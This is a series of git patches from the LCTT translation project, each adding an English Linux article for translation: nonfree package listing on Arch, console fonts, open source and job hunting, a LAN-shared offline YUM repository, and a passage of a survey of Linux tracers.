+| chromium-pepper-flash | nonfree | | proprietary Google Chrome EULA, missing sources |
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| faac | nonfree | | [FIXME:description] is a GPL'ed package, but has non free code that can't be distributed und|
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| libunrar | nonfree | | part of nonfree unrar, Issue442 |
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| opera | nonfree | | nonfree, nondistributable, built from binary installers, etc |
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| shutter | nonfree | | need registered user to download (and access website) the source code and depends perl-net-d|
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| ttf-ms-fonts | nonfree | | |
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| ttf-ubuntu-font-family | nonfree | | Ubuntu font license considered non-free by DFSG and Fedora |
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| unace | nonfree | | license forbids making competing ACE archivers from unace |
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| unrar | nonfree | unar | |
+| | | fsf | |
+| | | unrar | |
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| virtualbox | nonfree | | contains BIOS which needs a nonfree compiler to build from source (OpenWatcom compiler), doe|
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| wordnet | nonfree | | |
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+
+
+Save list to file? (Y/n)
+```
+
+[![][3]][4]
+
+As you can see, I have 47 proprietary packages on my system. Like I said already, we can save the list to a file and review it later. To do so, just press 'y' when you are prompted to save the list to a file. Then press 'y' to accept the defaults or hit 'n' to save it in your preferred format and location.
+```
+Save list to file? (Y/n) y
+Save as markdown table? (Y/n) y
+Save it to (/tmp/tmpkuky_082.md): y
+The list is saved at /home/sk/absolutely-proprietary/y.md
+
+You can review it from the command line
+using the "less -S /home/sk/absolutely-proprietary/y.md"
+or, if installed, the "most /home/sk/absolutely-proprietary/y.md" commands
+```
+
+As you may have noticed, I have only **nonfree** packages. The utility can display two more types of packages, namely semifree and uses-nonfree:
+
+ * **nonfree** : This package is blatantly nonfree software.
+ * **semifree** : This package is mostly free, but contains some nonfree software.
+ * **uses-nonfree** : This package depends on, recommends, or otherwise inappropriately integrates with other nonfree software or services.
+
+
+
+Another notable feature of this utility is that it not only displays the proprietary packages, but also suggests libre alternatives to them.
+
+Hope this helps. I will be back soon with another useful guide. Stay tuned!
+
+Cheers!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/find-installed-proprietary-packages-arch-linux/
+
+作者:[SK][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:https://git.parabola.nu/blacklist.git/plain/blacklist.txt
+[2]:https://git.parabola.nu/blacklist.git/plain/aur-blacklist.txt
+[3]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[4]:http://www.ostechnix.com/wp-content/uploads/2018/01/Proprietary-Packages-1-1.png ()
From f6722eafd30b4f118b5d235ef5b21c4f2aff0903 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 09:45:50 +0800
Subject: [PATCH 043/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20Change?=
=?UTF-8?q?=20Your=20Linux=20Console=20Fonts?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... How to Change Your Linux Console Fonts.md | 88 +++++++++++++++++++
1 file changed, 88 insertions(+)
create mode 100644 sources/tech/20180104 How to Change Your Linux Console Fonts.md
diff --git a/sources/tech/20180104 How to Change Your Linux Console Fonts.md b/sources/tech/20180104 How to Change Your Linux Console Fonts.md
new file mode 100644
index 0000000000..302f8459b4
--- /dev/null
+++ b/sources/tech/20180104 How to Change Your Linux Console Fonts.md
@@ -0,0 +1,88 @@
+translating by lujun9972
+How to Change Your Linux Console Fonts
+======
+![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/font-size_0.png?itok=d97vmyYa)
+
+I try to be a peaceful soul, but some things make that difficult, like tiny console fonts. Mark my words, friends, someday your eyes will be decrepit and you won't be able to read those tiny fonts you coded into everything, and then you'll be sorry, and I will laugh.
+
+Fortunately, Linux fans, you can change your console fonts. As always, the ever-changing Linux landscape makes this less than straightforward, and font management on Linux is non-existent, so we'll muddle along as best we can. In this article, I'll show what I've found to be the easiest approach.
+
+### What is the Linux Console?
+
+Let us first clarify what we're talking about. When I say Linux console, I mean TTY1-6, the virtual terminals that you access from your graphical desktop with Ctrl+Alt+F1 through F6. To get back to your graphical environment, press Alt+F7. (This is no longer universal, however, and your Linux distribution may have it mapped differently. You may have more or fewer TTYs, and your graphical session may not be at F7. For example, Fedora puts the default graphical session at F2, and an extra one at F1.) I think it is amazingly cool that we can have both X and console sessions running at the same time.
+
+The Linux console is part of the kernel, and does not run in an X session. This is the same console you use on headless servers that have no graphical environments. I call the terminals in a graphical session X terminals, and terminal emulators is my catch-all name for both console and X terminals.
+
+But that's not all. The Linux console has come a long way from the early ANSI days, and thanks to the Linux framebuffer, it has Unicode and limited graphics support. There are also a number of console multimedia applications that we will talk about in a future article.
+
+### Console Screenshots
+
+The easy way to get console screenshots is from inside a virtual machine. Then you can use your favorite graphical screen capture program from the host system. You may also make screen captures from your console with [fbcat][1] or [fbgrab][2]. `fbcat` creates a portable pixmap format (PPM) image; this is a highly portable uncompressed image format that should be readable on any operating system, and of course you can convert it to whatever format you want. `fbgrab` is a wrapper script to `fbcat` that creates a PNG file. There are multiple versions of `fbgrab` written by different people floating around. Both have limited options and make only a full-screen capture.
+
+`fbcat` needs root permissions, and its output must be redirected to a file. Do not specify a file extension, only the filename:
+```
+$ sudo fbcat > Pictures/myfile
+
+```
+
+After cropping in GIMP, I get Figure 1.
+
+It would be nice to have a little padding on the left margin, so if any of you excellent readers know how to do this, please tell us in the comments.
+
+`fbgrab` has a few more options that you can read about in `man fbgrab`, such as capturing a different console, and time delay. This example makes a screen grab just like `fbcat`, except you don't have to explicitly redirect:
+```
+$ sudo fbgrab Pictures/myOtherfile
+
+```
+
+### Finding Fonts
+
+As far as I know, there is no way to list your installed kernel fonts other than looking in the directories they are stored in: `/usr/share/consolefonts/` (Debian/etc.), `/lib/kbd/consolefonts/` (Fedora), `/usr/share/kbd/consolefonts` (openSUSE)...you get the idea.
+
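+For example, on a Debian-based system you could simply list that directory (adjust the path for your distribution as noted above):
+```
+$ ls /usr/share/consolefonts/
+```
+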
+### Changing Fonts
+
+Readable fonts are not a new concept. Embrace the old! Readability matters. And so does configurability, which sometimes gets lost in the rush to the new-shiny.
+
+On Debian/Ubuntu/etc. systems you can run `sudo dpkg-reconfigure console-setup` to set your console font, then run the `setupcon` command in your console to activate the changes. `setupcon` is part of the `console-setup` package. If your Linux distribution doesn't include it, there might be a package for you at [openSUSE][3].
+
+You can also edit `/etc/default/console-setup` directly. This example sets the Terminus Bold font at 32 points, which is my favorite, and restricts the width to 80 columns.
+```
+ACTIVE_CONSOLES="/dev/tty[1-6]"
+CHARMAP="UTF-8"
+CODESET="guess"
+FONTFACE="TerminusBold"
+FONTSIZE="16x32"
+SCREEN_WIDTH="80"
+
+```
+
+The FONTFACE and FONTSIZE values come from the font's filename, `TerminusBold32x16.psf.gz`. Yes, you have to know to reverse the order for FONTSIZE. Computers are so much fun. Run `setupcon` to apply the new configuration. You can see the whole character set for your active font with `showconsolefont`. Refer to `man console-setup` for complete options.
+
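+To recap the apply-and-check steps described in the paragraph above:
+```
+$ setupcon          # apply the configuration from /etc/default/console-setup
+$ showconsolefont   # display the character set of the now-active font
+```
+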
+### Systemd
+
+Systemd is different from `console-setup`, and you don't need to install anything, except maybe some extra font packages. All you do is edit `/etc/vconsole.conf` and then reboot. On my Fedora and openSUSE systems I had to install some extra Terminus packages to get the larger sizes as the installed fonts only went up to 16 points, and I wanted 32. This is the contents of `/etc/vconsole.conf` on both systems:
+```
+KEYMAP="us"
+FONT="ter-v32b"
+
+```
+
+Come back next week to learn some more cool console hacks, and some multimedia console applications.
+
+Learn more about Linux through the free ["Introduction to Linux" ][4]course from The Linux Foundation and edX.
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/learn/intro-to-linux/2018/1/how-change-your-linux-console-fonts
+
+作者:[Carla Schroder][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/users/cschroder
+[1]:http://jwilk.net/software/fbcat
+[2]:https://github.com/jwilk/fbcat/blob/master/fbgrab
+[3]:https://software.opensuse.org/package/console-setup
+[4]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
From 5c1c301d3df3c729839fdd4e8770fc3dd1bb502b Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 09:51:06 +0800
Subject: [PATCH 044/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=205=20ways=20open?=
=?UTF-8?q?=20source=20can=20strengthen=20your=20job=20search?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...n source can strengthen your job search.md | 55 +++++++++++++++++++
1 file changed, 55 insertions(+)
create mode 100644 sources/tech/20180103 5 ways open source can strengthen your job search.md
diff --git a/sources/tech/20180103 5 ways open source can strengthen your job search.md b/sources/tech/20180103 5 ways open source can strengthen your job search.md
new file mode 100644
index 0000000000..945465e78e
--- /dev/null
+++ b/sources/tech/20180103 5 ways open source can strengthen your job search.md
@@ -0,0 +1,55 @@
+5 ways open source can strengthen your job search
+======
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/resume_career_document_general.png?itok=JEaFL2XI)
+
+Are you searching for a job in the bustling tech industry? Whether you're a seasoned member of the tech community looking for a new challenge or a recent graduate looking for your first job, contributing to open source projects can be a great way to boost your attractiveness as a candidate. Below are five ways your work on open source projects may strengthen your job hunt.
+
+### 1. Get project experience
+
+Perhaps the clearest way working on open source projects can assist in your job search is by giving you project experience. If you are a student, you may not have many concrete projects to showcase on your resume. If you are working, perhaps you can't discuss your current projects due to privacy limitations, or maybe you're not working on tasks that interest you. Either way, scouting out appealing open source projects that allow you to showcase your skills may help in your job search. These projects are great eye-catchers on resumes and can be perfect discussion topics in interviews.
+
+In addition, many open source projects are kept in public repositories, such as [GitHub][1], so accessing the source code is easy for anyone who wants to become involved. Also, it makes your publicly accessible code contributions easy for recruiters and other individuals at potential employers to find. The fact that these projects are open allows you to demonstrate your skills in a more concrete manner than simply discussing them in an interview.
+
+### 2. Learn to ask good questions
+
+Any new member of an open source project community has the opportunity to learn a lot. They must discover avenues of communication; structure and hierarchy; documentation format; and many other aspects unique to the project. To begin participating in and contributing to a project, you need to ask many questions to put yourself in a position for success. As the familiar saying goes, there are no stupid questions. Open source project communities promote inquisitiveness, especially when answers aren't easy to find.
+
+The unfamiliarity when beginning to work on open source projects teaches individuals to ask questions, and to ask them often. This helps participants develop great skills in identifying what questions to ask, how to ask them, and who to approach. This skill is useful in job searching, [interviewing][2], and living life in general. Problem-solving skills and reaching out for help when you need it are highly valued in the job market.
+
+### 3. Access new technologies and continuous learning
+
+Most software projects use many different technologies. It is rare for every contributor to be familiar with every piece of technology in a project. Even after working on a project for a while, individuals likely won't be familiar with all the technologies it uses.
+
+While veterans of an open source project may be unfamiliar with certain pieces of the project, newbies will be extremely unfamiliar with many or most. This creates a huge learning opportunity. A person may begin working on an open source project to improve one piece of functionality, most likely in a technical area they are familiar with. But the path from there can take a much different turn.
+
+Working on one aspect of a project might lead you down an unfamiliar road and prompt new learning. Working on an open source project may expose you to new technologies you would never use otherwise. It can also reveal new passions, or at minimum, facilitate continuous learning--which [employers find highly desirable][3].
+
+### 4. Increase your connections and network
+
+Open source projects are maintained and surrounded by diverse communities. Some individuals working on open source projects do so in their free time, and they all have their own backstories, interests, and connections. As they say, "it's all about who you know." You may never meet certain people except through working on an open source project. Maybe you'll work with people around the world, or maybe you'll connect with your next-door neighbor. Regardless, you never know who may help connect you to your next job. The connections and networking possibilities created through an open source project may be extremely helpful in finding your next (or first!) job.
+
+### 5. Build confidence
+
+Finally, contributing to open source projects may give you a newfound confidence. Many new employees in the tech industry may feel a sense of [imposter syndrome][4], because without having accomplished significant work, they may feel they don't belong, they are frauds, or they don't deserve to be in their new position. Working on open source projects before you are hired may minimize this issue.
+
+Work on open source projects is often done individually, but it all contributes to the project as a whole. Open source communities are highly inclusive and cooperative, and your contributions will be noticed. It is always rewarding to be validated by other community members (especially more senior members). The recognition you may gain from code commits to an open source project could improve your confidence and counter imposter syndrome. This confidence can then carry over to interviews, new positions, and beyond.
+
+These are only a handful of the benefits you may see from working on open source projects. If you know of other advantages, please share them in the comments below.
+
+### About The Author
+
+Sophie Polson is a senior at Duke University studying computer science. She has just started to venture into the open source community via the "Open Source World" course taught at Duke and has developed an interest in exploring DevOps. She will be working as a software engineer following her graduation.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/18/1/5-ways-turn-open-source-new-job
+
+作者:[Sophie Polson][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/sophiepolson
+[1]:https://github.com/dbaldwin/DronePan
+[2]:https://www.thebalance.com/why-you-should-ask-questions-in-a-job-interview-1669548
+[3]:https://www.computerworld.com/article/3177442/it-careers/lifelong-learning-is-no-longer-optional.html
+[4]:https://en.wikipedia.org/wiki/Impostor_syndrome
From 5480b1059c4937d7ea271e527d76a90ef8e442e9 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 09:58:43 +0800
Subject: [PATCH 045/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Creating=20an=20O?=
=?UTF-8?q?ffline=20YUM=20repository=20for=20LAN?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ating an Offline YUM repository for LAN.md | 111 ++++++++++++++++++
1 file changed, 111 insertions(+)
create mode 100644 sources/tech/20180103 Creating an Offline YUM repository for LAN.md
diff --git a/sources/tech/20180103 Creating an Offline YUM repository for LAN.md b/sources/tech/20180103 Creating an Offline YUM repository for LAN.md
new file mode 100644
index 0000000000..315da3efbd
--- /dev/null
+++ b/sources/tech/20180103 Creating an Offline YUM repository for LAN.md
@@ -0,0 +1,111 @@
+translating by lujun9972
+Creating an Offline YUM repository for LAN
+======
+In our earlier tutorial, we discussed "**[How we can create our own yum repository with ISO image & by mirroring an online yum repository][1]**". Creating your own yum repository is a good idea, but it's not ideal if you are only using 2-3 Linux machines on your network. However, it definitely has advantages when you have a large number of Linux servers on your network that are updated regularly, or when you have some sensitive Linux machines that can't be exposed to the Internet directly.
+
+When we have a large number of Linux systems & each system updates directly from the Internet, the data consumed will be enormous. In order to save that data, we can create an offline yum repository & share it over our local network. The other Linux machines on the network will then fetch system updates directly from this local yum, thus saving data, & transfer speeds will also be very good since we stay on our local network.
+
+We can share our yum repository using any of the following or both methods:
+
+ * **Using Web Server (Apache)**
+ * **Using ftp (VSFTPD)**
+
+
+
+We will be discussing both of these methods but before we start, you should create a YUM repository using my earlier tutorial ( **[READ HERE][1]** )
+
+
+## Using Web Server
+
+Firstly we need to install the web server (Apache) on our yum server, which has the IP address **192.168.1.100**. Since we have already configured a yum repository for this system, we will install the Apache web server using the yum command,
+
+```
+$ yum install httpd
+```
+
+Next, we need to copy all the rpm packages to the default Apache root directory, i.e. **/var/www/html**, or, since we have already copied our packages to **/YUM**, we can instead create a symbolic link named CentOS inside /var/www/html that points to /YUM,
+
+```
+$ ln -s /YUM /var/www/html/CentOS
+```
+
+Restart your web server to implement the changes
+
+```
+$ systemctl restart httpd
+```
+
+
+### Configuring client machine
+
+The server-side configuration for sharing the yum repository is complete & now we will configure our client machine, with IP address **192.168.1.101**, to receive updates from our offline yum.
+
+Create a file named **offline-yum.repo** in **/etc/yum.repos.d** folder & enter the following details,
+
+```
+$ vi /etc/yum.repos.d/offline-yum.repo
+```
+
+```
+[offline-yum]
+name=Local YUM
+baseurl=http://192.168.1.100/CentOS/7
+gpgcheck=0
+enabled=1
+```
+
+Your Linux machine is now configured to receive updates over the LAN from your offline yum repository. To confirm that the repository is working fine, try to install or update a package using the yum command.
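+
+For example, a quick sanity check is to clear the yum cache and list the repositories again; the repository id below matches the offline-yum section header used in the file above, and the package name is only a placeholder:
+```
+$ yum clean all
+$ yum repolist                     # the offline-yum repository should appear here
+$ yum install <package-name>       # any package that exists in the offline repository
+```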
+
+## Using FTP server
+
+To share our YUM repository over FTP, we will first install the required package, i.e. vsftpd
+
+```
+$ yum install vsftpd
+```
+
+The default root directory for vsftpd is /var/ftp/pub, so either copy the rpm packages to this folder or create a symbolic link at /var/ftp/pub/CentOS pointing to /YUM,
+
+```
+$ ln -s /YUM /var/ftp/pub/CentOS
+```
+
+Now, restart the server to apply the changes
+
+```
+$ systemctl restart vsftpd
+```
+
+### Configuring client machine
+
+We will now create a file named **offline-yum.repo** in **/etc/yum.repos.d** , as we did above & enter the following details,
+
+```
+$ vi /etc/yum.repos.d/offline-yum.repo
+```
+
+```
+[offline-yum]
+name=Local YUM
+baseurl=ftp://192.168.1.100/pub/CentOS/7
+gpgcheck=0
+enabled=1
+```
+
+Your client machine is now ready to receive updates over FTP. For configuring the vsftpd server to share files with other Linux systems, [**read the tutorial here**][2].
+
+Both methods for sharing an offline yum repository over the LAN work fine, & you can choose either of them. If you have any queries/comments, please share them in the comment box below.
+
+
+--------------------------------------------------------------------------------
+
+via: http://linuxtechlab.com/offline-yum-repository-for-lan/
+
+作者:[Shusain][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://linuxtechlab.com/author/shsuain/
+[1]:http://linuxtechlab.com/creating-yum-repository-iso-online-repo/
+[2]:http://linuxtechlab.com/ftp-secure-installation-configuration/
From abf8d969cfe0a7a03df43f1859f501b3e4e0fbed Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 11:30:03 +0800
Subject: [PATCH 046/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Choosing=20a=20Li?=
=?UTF-8?q?nux=20Tracer=20(2015)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...20150708 Choosing a Linux Tracer (2015).md | 192 ++++++++++++++++++
1 file changed, 192 insertions(+)
create mode 100644 sources/tech/20150708 Choosing a Linux Tracer (2015).md
diff --git a/sources/tech/20150708 Choosing a Linux Tracer (2015).md b/sources/tech/20150708 Choosing a Linux Tracer (2015).md
new file mode 100644
index 0000000000..4f23184802
--- /dev/null
+++ b/sources/tech/20150708 Choosing a Linux Tracer (2015).md
@@ -0,0 +1,192 @@
+Choosing a Linux Tracer (2015)
+======
+[![][1]][2]
+_Linux Tracing is Magic!_
+
+A tracer is an advanced performance analysis and troubleshooting tool, but don't let that intimidate you... If you've used strace(1) or tcpdump(8) - you've used a tracer. System tracers can see much more than just syscalls or packets, as they can typically trace any kernel or application software.
+
+There are so many Linux tracers that the choice is overwhelming. As each has an official (or unofficial) pony-corn mascot, we have enough for a kids' show.
+
+Which tracer should you use?
+
+I've answered this question for two audiences: for most people, and for performance/kernel engineers. This will also change over time, so I'll need to post follow-ups, maybe once a year or so.
+
+## For Most People
+
+Most people (developers, sysadmins, devops, SREs, ...) are not going to learn a system tracer in gory detail. Here's what you most likely need to know and do about tracers:
+
+### 1. Use perf_events for CPU profiling
+
+Use perf_events to do CPU profiling. The profile can be visualized as a [flame graph][3]. Eg:
+```
+git clone --depth 1 https://github.com/brendangregg/FlameGraph
+perf record -F 99 -a -g -- sleep 30
+perf script | ./FlameGraph/stackcollapse-perf.pl | ./FlameGraph/flamegraph.pl > perf.svg
+
+```
+
+Linux perf_events (aka "perf", after its command) is the official tracer/profiler for Linux users. It is in the kernel source, and is well maintained (and currently rapidly being enhanced). It's usually added via a linux-tools-common package.
+
+perf can do many things, but if I had to recommend you learn just one, it would be CPU profiling, even though this is technically not "tracing" of events, as it's sampling. The hardest part is getting full stacks and symbols to work, which I covered in my [Linux Profiling at Netflix][4] talk for Java and Node.js.
+
+### 2. Know what else is possible
+
+As a friend once said: "You don't need to know how to operate an X-ray machine, but you _do_ need to know that if you swallow a penny, an X-ray is an option!" You need to know what is possible with tracers, so that if your business really needs it, you can either learn how to do it later, or hire someone who does.
+
+In a nutshell: performance of virtually anything can be understood with tracing. File system internals, TCP/IP processing, device drivers, application internals. Read my lwn.net [article on ftrace][5], and browse my [perf_events page][6], as examples of some tracing (and profiling) capabilities.
+
+### 3. Ask for front ends
+
+If you are paying for performance analysis tools (and there are many companies that sell them), ask for Linux tracing support. Imagine an intuitive point-and-click interface that can expose kernel internals, including latency heatmaps at different stack locations. I described such an interface in my [Monitorama talk][7].
+
+I've created and open sourced some front ends myself, although for the CLI (not GUIs). These also allow people to benefit from the tracers more quickly and easily. Eg, from my [perf-tools][8], tracing new processes:
+```
+# ./execsnoop
+Tracing exec()s. Ctrl-C to end.
+ PID PPID ARGS
+ 22898 22004 man ls
+ 22905 22898 preconv -e UTF-8
+ 22908 22898 pager -s
+ 22907 22898 nroff -mandoc -rLL=164n -rLT=164n -Tutf8
+[...]
+
+```
+
+At Netflix, we're creating [Vector][9], an instance analysis tool that should also eventually front Linux tracers.
+
+## For Performance or Kernel Engineers
+
+Our job is much harder, since most people may be asking us to figure out how to trace something, and therefore which tracer to use. To properly understand a tracer, you usually need to spend at least one hundred hours with it. Understanding all the Linux tracers well enough to make a rational decision between them is a huge undertaking. (I may be the only person who has come close to doing this.)
+
+Here's what I'd recommend. Either:
+
+A) Pick one all-powerful tracer, and standardize on that. This will involve a lot of time figuring out its nuances and safety in a test environment. I'd currently recommend the latest version of SystemTap (ie, build from [source][10]). I know of companies that have picked LTTng, and are happy with it, although it's not quite as powerful (although, it is safer). If sysdig adds tracepoints or kprobes, it could be another candidate.
+
+B) Follow the above flow chart from my [Velocity tutorial][11]. It will mean using ftrace or perf_events as much as possible, eBPF as it gets integrated, and then other tracers like SystemTap/LTTng to fill in the gaps. This is what I do in my current job at Netflix.
+
+Comments by tracer:
+
+### 1. ftrace
+
+I love [Ftrace][12], it's a kernel hacker's best friend. It's built into the kernel, and can consume tracepoints, kprobes, and uprobes, and provides a few capabilities: event tracing, with optional filters and arguments; event counting and timing, summarized in-kernel; and function-flow walking. See [ftrace.txt][13] from the kernel source for examples. It's controlled via /sys, and is intended for a single root user (although you could hack multi-user support using buffer instances). Its interface can be fiddly at times, but it's quite hackable, and there are front ends: Steven Rostedt, the main ftrace author, has created trace-cmd, and I've created the perf-tools collection. My biggest gripe is that it isn't programmable, so you can't, for example, save and fetch timestamps, calculate latency, and then store it as a histogram. You'll need to dump events to user-level, and post-process, at some cost. It may become programmable via eBPF.
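+
+To give a flavor of the /sys interface described above, here is a minimal sketch (not from the original post) that enables a single scheduler tracepoint and streams its events:
+```
+# cd /sys/kernel/debug/tracing
+# echo 1 > events/sched/sched_switch/enable   # enable one tracepoint
+# cat trace_pipe | head                       # stream events as they arrive
+# echo 0 > events/sched/sched_switch/enable   # disable it again
+```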
+
+### 2. perf_events
+
+[perf_events][14] is the main tracing tool for Linux users, its source is in the Linux kernel, and is usually added via a linux-tools-common package. Aka "perf", after its front end, which is typically used to trace & dump to a file (perf.data), which it does relatively efficiently (dynamic buffering), and then post-processeses that later. It can do most of what ftrace can. It can't do function-flow walking, and is a bit less hackable (as it has better safety/error checking). But it can do profiling (sampling), CPU performance counters, user-level stack translation, and can consume debuginfo for line tracing with local variables. It also supports multiple concurrent users. As with ftrace, it isn't kernel programmable yet, until perhaps eBPF support (patches have been proposed). If there's one tracer I'd recommend people learn, it'd be perf, as it can solve a ton of issues, and is relatively safe.
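+
+For instance, tracing a static tracepoint system-wide and then dumping the events looks like this (my sketch, not from the original article; the block I/O tracepoint is just an example):
+```
+# perf record -e block:block_rq_issue -a -- sleep 10   # trace block I/O issue events for 10s
+# perf script                                          # post-process and print the events
+```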
+
+### 3. eBPF
+
+The extended Berkeley Packet Filter is an in-kernel virtual machine that can run programs on events, efficiently (JIT). It's likely to eventually provide in-kernel programming for ftrace and perf_events, and to enhance other tracers. It's currently being developed by Alexei Starovoitov, and isn't fully integrated yet, but there's enough in-kernel (as of 4.1) for some impressive tools: eg, latency heat maps of block device I/O. For reference, see the [BPF slides][15] from Alexei, and his [eBPF samples][16].
+
+### 4. SystemTap
+
+[SystemTap][17] is the most powerful tracer. It can do everything: profiling, tracepoints, kprobes, uprobes (which came from SystemTap), USDT, in-kernel programming, etc. It compiles programs into kernel modules and loads them - an approach which is tricky to get safe. It is also developed out of tree, and has had issues in the past (panics or freezes). Many are not SystemTap's fault - it's often the first to use certain tracing capabilities with the kernel, and the first to run into bugs. The latest version of SystemTap is much better (you must compile from source), but many people are still spooked from earlier versions. If you want to use it, spend time in a test environment, and chat to the developers in #systemtap on irc.freenode.net. (Netflix has a fault-tolerant architecture, and we have used SystemTap, but we may be less concerned about safety than you.) My biggest gripe is that it seems to assume you'll have kernel debuginfo, which I don't usually have. It actually can do a lot without it, but documentation and examples are lacking (I've begun to help with that myself).
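+
+As a taste of its scripting (a hedged sketch, in the classic one-liner style), tracing which processes open which files looks roughly like:
+```
+# stap -e 'probe syscall.open { printf("%s opened %s\n", execname(), filename) }'
+```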
+
+### 5. LTTng
+
+[LTTng][18] has optimized event collection, which outperforms other tracers, and also supports numerous event types, including USDT. It is developed out of tree. The core of it is very simple: write events to a tracing buffer, via a small and fixed set of instructions. This helps make it safe and fast. The downside is that there's no easy way to do in-kernel programming. I keep hearing that this is not a big problem, since it's so optimized that it can scale sufficiently despite needing post processing. It also has been pioneering a different analysis technique, more of a black box recording of all interesting events that can be studied in GUIs later. I'm concerned about such a recording missing events I didn't have the foresight to record, but I really need to spend more time with it to see how well it works in practice. It's the tracer I've spent the least time with (no particular reason).
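+
+To give a sense of the workflow (my sketch, not from the original post), a kernel tracing session looks roughly like this:
+```
+# lttng create demo-session                 # create a tracing session
+# lttng enable-event --kernel sched_switch  # enable a kernel tracepoint
+# lttng start
+# lttng stop
+# lttng view | head                         # print the recorded events
+# lttng destroy demo-session
+```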
+
+### 6. ktap
+
+[ktap][19] was a really promising tracer, which used an in-kernel lua virtual machine for processing, and worked fine without debuginfo and on embedded devices. It made it into staging, and for a moment looked like it would win the trace race on Linux. Then eBPF began kernel integration, and ktap integration was postponed until it could use eBPF instead of its own VM. Since eBPF is still integrating many months later, the ktap developers have been waiting a long time. I hope it restarts development later this year.
+
+### 7. dtrace4linux
+
+[dtrace4linux][20] is mostly one man's part-time effort (Paul Fox) to port Sun DTrace to Linux. It's impressive, and some providers work, but it's some ways from complete, and is more of an experimental tool (unsafe). I think concern over licensing has left people wary of contributing: it will likely never make it into the Linux kernel, as Sun released DTrace under the CDDL license; Paul's approach to this is to make it an add-on. I'd love to see DTrace on Linux and this project finished, and thought I'd spend time helping it finish when I joined Netflix. However, I've been spending time using the built-in tracers, ftrace and perf_events, instead.
+
+### 8. OL DTrace
+
+[Oracle Linux DTrace][21] is a serious effort to bring DTrace to Linux, specifically Oracle Linux. Various releases over the years have shown steady progress. The developers have even spoken about improving the DTrace test suite, which shows a promising attitude to the project. Many useful providers have already been completed: syscall, profile, sdt, proc, sched, and USDT. I'm still waiting for fbt (function boundary tracing, for kernel dynamic tracing), which will be awesome on the Linux kernel. Its ultimate success will hinge on whether it's enough to tempt people to run Oracle Linux (and pay for support). Another catch is that it may not be entirely open source: the kernel components are, but I've yet to see the user-level code.
+
+### 9. sysdig
+
+[sysdig][22] is a new tracer that can operate on syscall events with tcpdump-like syntax, and lua post processing. It's impressive, and it's great to see innovation in the system tracing space. Its limitations are that it is syscalls only at the moment, and, that it dumps all events to user-level for post processing. You can do a lot with syscalls, although I'd like to see it support tracepoints, kprobes, and uprobes. I'd also like to see it support eBPF, for in-kernel summaries. The sysdig developers are currently adding container support. Watch this space.
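+
+For example (a hedged sketch), filtering syscall events with its tcpdump-like syntax and running one of its bundled chisels looks like:
+```
+# sysdig proc.name=httpd and evt.type=open   # show open() events from httpd processes
+# sysdig -c topprocs_cpu                     # run a chisel: top processes by CPU
+```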
+
+## Further Reading
+
+My own work with the tracers includes:
+
+**ftrace** : My [perf-tools][8] collection (see the examples directory); my lwn.net [article on ftrace][5]; a [LISA14][8] talk; and the posts: [function counting][23], [iosnoop][24], [opensnoop][25], [execsnoop][26], [TCP retransmits][27], [uprobes][28], and [USDT][29].
+
+**perf_events** : My [perf_events Examples][6] page; a [Linux Profiling at Netflix][4] talk for SCALE; and the posts [CPU Sampling][30], [Static Tracepoints][31], [Heat Maps][32], [Counting][33], [Kernel Line Tracing][34], [off-CPU Time Flame Graphs][35].
+
+**eBPF** : The post [eBPF: One Small Step][36], and some [BPF-tools][37] (I need to publish more).
+
+**SystemTap** : I wrote a [Using SystemTap][38] post a long time ago, which is somewhat out of date. More recently I published some [systemtap-lwtools][39], showing how SystemTap can be used without kernel debuginfo.
+
